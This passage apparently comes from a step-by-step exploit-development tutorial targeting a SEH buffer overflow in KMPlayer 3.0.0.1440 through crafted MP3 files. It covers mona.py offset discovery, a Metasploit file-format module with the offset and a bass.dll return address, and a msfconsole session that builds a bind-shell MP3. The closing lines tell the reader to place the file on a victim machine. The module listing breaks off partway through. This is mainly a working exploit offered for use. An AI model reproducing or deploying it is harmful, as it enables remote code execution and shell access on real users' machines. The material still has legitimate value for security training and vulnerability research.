The above code will create a MP3 file with name “kmp_crash.mp3” and the content will be header and 5000 “A”s.

Run KMPlayer, attach it to Immunity Debugger and open malicious mp3 file in KMPlayer.

The KMPlayer crashes with EIP overwritten with 41414141. This is already exploited in mentioned exploits. Let’s check the SEH chain. Go to "View" and select "SEH".

SEH handlers also get overwritten with 41414141 which is user specified input. An attacker can execute malicious code by pointing this SEH handler to his/her choice of address where malicious code (shellcode) is placed in memory.

2. Fun with !mona

As we have identified the SEH overflow, let’s use mona.py to craft an exploit for this.

Run KMPlayer, attach it to Immunity Debugger. Immunity Debugger will be paused and use this time to run pycommands using mona.py. The output of commands can be seen in “Log” window.

Specify working folder with !mona config –set workingfolder C:\logs\%p and verify the same with !mona config –get workingfolder

With this, all the files created by !mona commands will be stored in this directory.

Now create a pattern of 5000 characters which will be used to replace 5000 “A”s in our mp3 file. This is a cyclic pattern of characters which will help to identify the offsets to overwrite EIP,SEH, or any other registers. This is very helpful while developing an exploit.

Run !mona pc 5000 command in Immunity Debbuger.

This will create a file named “pattern.txt”.

Copy the pattern, replace junk content with this and regenerate the mp3 file.

Now run the KMPlayer from Immunity Debbuger as it is still ‘paused’ and open newly created mp3 file in KMPlayer.

The KMPlayer is crashed as expected. Now run !mona suggest command.

This command will analyze the cyclic pattern to calculate offsets to various registers and SEH handlers and gives the payload to include this in metasploit module. This will create a file ‘exploit.rb’ which has all the mentioned details.

Mona has given exploits payload for Direct RET and SEH overflows. Now let’s craft a metasploit module to exploit SEH.

3. Crafting metasploit module

Output of !mona suggest has following output for SEH exploit:

Metasploit 'include' section :

-----------------------------

#Don't forget to include the SEH mixin !

include Msf::Exploit::Seh

Metasploit 'Targets' section :

------------------------------

'Targets'=>

[

[ '<fill in the OS/app version here>',

{

'Ret'=>0x1101dd36,

'Offset'=>3314

}

], # pop esi # pop ebx # ret 10 - bass.dll

],

Metasploit 'exploit' section :

-----------------------------

def exploit

buffer = rand_text(target['Offset'])#junk

buffer << generate_seh_record(target.ret)

buffer << make_nops(30)

buffer << payload.encoded#1652 bytes of space

end

Based on above suggession, I have crafted following metasploit module for KMPlayer SEH exploiations.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::FILEFORMAT

include Msf::Exploit::Seh

def initialize(info = {})

super(update_info(info,

'Name'=> 'The KMPlayer 3.0.0.1440 .mp3 SEH exploit module',

'Description'=> %q{

This module exploits a stack buffer overflow in The KMPlayer 3.0.0.1440.When opening a specially crafted MP3 file (.mp3) in the application, SEH handler will be overwrite.

Copy this file in ‘exploits’ section in metasploit to include it in metasploit framework. On Backtrack5, the path is /pentest/exploits/framework3/modules/exploits/windows/fileformat/

Start the metasploit using msfconsole command, use this exploit, set payload as windows/shell_bind_tcp and run exploit command. This will create the malicious mp3 file which will exploit SEH overflow and will listen on a port specified in payload once it opened in KMPlayer.

root@bt:~# msfconsole

___ _

| || |(_) |

_ __ ______| |_ __ _ ___ _ __ | | ____| |_

| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|

| | | | | |__/ || (_| \__ \ |_) | | (_) | | |_

|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|

| |

|_|

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]

+ -- --=[ 708 exploits - 359 auxiliary - 57 post

+ -- --=[ 224 payloads - 27 encoders - 8 nops

=[ svn r13044 updated today (2011.06.28)

msf > use exploit/windows/fileformat/km_player_mp3_seh

msf exploit(km_player_mp3_seh) > show options

Module options (exploit/windows/fileformat/km_player_mp3_seh):

NameCurrent SettingRequiredDescription

--------------------------------------

FILENAMEmsf.mp3yesmp3 file

Exploit target:

IdName

------

0Windows XP SP3 English VMware

msf exploit(km_player_mp3_seh) > set PAYLOAD windows/shell_bind_tcp

PAYLOAD => windows/shell_bind_tcp

msf exploit(km_player_mp3_seh) > show options

Module options (exploit/windows/fileformat/km_player_mp3_seh):

NameCurrent SettingRequiredDescription

--------------------------------------

FILENAMEmsf.mp3yesmp3 file

Payload options (windows/shell_bind_tcp):

NameCurrent SettingRequiredDescription

--------------------------------------

EXITFUNCprocessyesExit technique: seh, thread, process, none

LPORT4444yesThe listen port

RHOSTnoThe target address

Exploit target:

IdName

------

0Windows XP SP3 English VMware

msf exploit(km_player_mp3_seh) > exploit

[*] Creating 'msf.mp3' file ...

[*] Writing payload to file

[*] Generated output file /root/.msf3/data/exploits/msf.mp3

msf exploit(km_player_mp3_seh) >

The file named ‘msf.mp3’ is created at /root/.msf3/data/exploits/msf.mp3. Copy this file on victim machine, open it in KMPlayer. The application didn’t crash but the SEH has been exploited and the victim machine will listen on port 4444 on which when connected will spawn a shell.